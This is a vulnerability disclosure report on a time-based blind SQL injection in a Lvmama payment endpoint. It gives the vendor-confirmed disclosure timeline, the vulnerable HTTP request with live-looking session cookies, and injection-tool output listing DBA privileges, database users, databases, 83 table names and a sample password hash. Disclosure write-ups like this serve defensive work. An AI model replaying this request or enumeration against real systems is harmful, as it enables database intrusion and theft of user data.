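2015-09-23: Details reported to the vendor; awaiting vendor response
2015-09-23: Vendor confirmed; details disclosed to the vendor only
2015-10-03: Details disclosed to core white hats and experts in related fields
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to trainee white hats
2015-11-07: Details disclosed to the public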
As in the title.
Test:
GET /payment/pay/geexOrder.do?callback=success_jsonp&TYPE=FRONT&APP_NAME=aaaaa&APP_START_DATE=&APP_END_DATE=&LOAN_DOWNPAY_MIN=&LOAN_DOWNPAY_MAX=&OPPT_ID=&_=1442927451066 HTTP/1.1
Host: pay.lvmama.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Referer: http://www.lvmama.com/myspace/geex.do
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKcFYBSTRiIi28AzMnAg==; lvsessionid=44abc08b-7275-498e-9ee7-395443b33064_15667285; CoreID6=37603654693514429248595&ci=90409730; vst_ebk_sessionid=f944f244-943d-49b5-a32f-e45f12ce0d3b; oUC=018115018115; oUT=08220822; CASTGC=TGC-56-fhisgT9f9AWdSkT5JywoNnSDyg1j8l60yQx3WL8TH0adoJ4YJe; unUserName=testaaaa; LSTA=781daaa8220ab30cd9fd0fd85ed6ae7b; EMV=U; UN=testaaaa%5E%21%5E4028b25b4fd5ada2014fdae694f60395; Hm_lvt_006c64491cb8acf2092ce0e0341797fe=1442926142; Hm_lpvt_006c64491cb8acf2092ce0e0341797fe=1442926142; _gscu_1059159971=42924981jf5s2210; _gscs_1059159971=42924981y2x3v110|pv:3; _gscbrs_1059159971=1; __xsptplus443=443.2.1442926066.1442926146.4%232%7Cwww.baidu.com%7C%7C%7C%7C%23%23jYwMqOfqxQhhqc_tXZ1w0zJmyc3najX9%23; __utma=30114658.550250882.1442926147.1442926147.1442926147.1; __utmb=30114658.31.10.1442926147; __utmc=30114658; __utmz=30114658.1442926147.1.1.utmcsr=login.lvmama.com|utmccn=(referral)|utmcmd=referral|utmcct=/nsso/null; bfd_s=30114658.38702051.1442924859756; tmc=43.30114658.99931619.1442924859758.1442927429127.1442927444549; tma=30114658.99931619.1442924859758.1442924859758.1442924859758.1; tmd=43.30114658.99931619.1442924859758.; bfd_g=b56c782bcb75035d0000354b00082c1e56014936; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442924860,1442924981,1442926072; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1442927446; 90409730_clogin=v=1&l=1442924859&e=1442929248795
Privileges:
current user is DBA: True
Users:
database management system users [4]:
[*] 'gravity'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
Databases:
available databases [7]:
[*] fast_log
[*] geex
[*] gravity
[*] gravity_pre
[*] information_schema
[*] mysql
[*] performance_schema
gravity:
[83 tables]
+------------------------+
| BIZ_APP01              |
| BIZ_APP01_FULL         |
| BIZ_APP_CHECKLIST      |
| BIZ_APP_COMMENTS       |
| BIZ_APP_COMMON         |
| BIZ_APP_COMMON_FULL    |
| BIZ_APP_LOG            |
| BIZ_APP_OPPT           |
| BIZ_APP_ORDER          |
| BIZ_APP_RECON_DTL      |
| BIZ_APP_RECON_SUM      |
| BIZ_APP_REJECT         |
| BIZ_APP_STATUS         |
| BIZ_APP_TRACK          |
| BIZ_CAMPAIGN           |
| BIZ_CANTACT_INFO       |
| BIZ_DEVICE             |
| BIZ_DFC_CONFIG         |
| BIZ_FUNDER             |
| BIZ_HAR_MERCHANT       |
| BIZ_HAR_PDT            |
| BIZ_HAR_REFUNDBANK     |
| BIZ_HAR_REPAY          |
| BIZ_HAR_REPAY2PDT      |
| BIZ_HAR_REPAYPLAN      |
| BIZ_HAR_SALES          |
| BIZ_HAR_STORE          |
| BIZ_HAR_STORE2PDT      |
| BIZ_LOAN_PDT           |
| BIZ_LOAN_PLAN          |
| BIZ_MERCHANT           |
| BIZ_PDT_SORT           |
| BIZ_PREPAYMENT         |
| BIZ_PREPAYMENT_ITEM    |
| BIZ_RESOUCES           |
| BIZ_RETAILS_PDT        |
| BIZ_SHD_LIST           |
| BIZ_STORE_ORGNZ        |
| BIZ_TAGGING            |
| BIZ_TAGS               |
| BIZ_TRANSACTION_RECORD |
| BIZ_UNIPAY_RECORD      |
| BIZ_V_APP_APL          |
| BIZ_V_APP_BCF          |
| BIZ_V_APP_BCF02        |
| BIZ_V_APP_BCF03        |
| BIZ_V_APP_BOC          |
| BIZ_V_APP_BYR          |
| BIZ_V_APP_GFC          |
| BIZ_V_APP_HAR          |
| BIZ_V_APP_QKE          |
| CRM_ACTION_LOG         |
| CRM_CONFIG             |
| CRM_CONVERT            |
| CRM_CRON_SCHEDULE      |
| CRM_DICT               |
| CRM_DICT2              |
| CRM_EMAIL_MGR          |
| CRM_EMAIL_RAW          |
| CRM_EMAIL_RAW_FULL     |
| CRM_EMAIL_SENT         |
| CRM_EMAIL_WORK         |
| CRM_GAME_KV            |
| CRM_RELATION           |
| CRM_SMS_MGR            |
| CRM_UNIQUEID_MGR       |
| CRM_UPDOWN_MGR         |
| CRM_USER_INFO_WECHAT   |
| FRAUD_FACEPP_DETECTION |
| FRAUD_FACEPP_SIMSCORE  |
| FRAUD_INSTINCT_INFO    |
| FRAUD_INSTINCT_OUT     |
| accounts               |
| ci_sessions            |
| dx_login_attempts      |
| dx_permissions         |
| dx_roles               |
| dx_user_autologin      |
| dx_user_profile        |
| dx_user_temp           |
| dx_users               |
| migrations             |
| pd_message             |
+------------------------+
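dx_users holds the user data. The passwords are encrypted, in a form like $1$.49TxKWL$0stw8KLcghDgaaASJrVHv1, but the other information can still be brute-forced out. Since this is a time-based blind injection, I did not go any further.
:-) Lvmama is a good vendor. If I dig up enough bugs, its gifts will catch up with me.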
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-09-23 10:24
Thank you!
None yet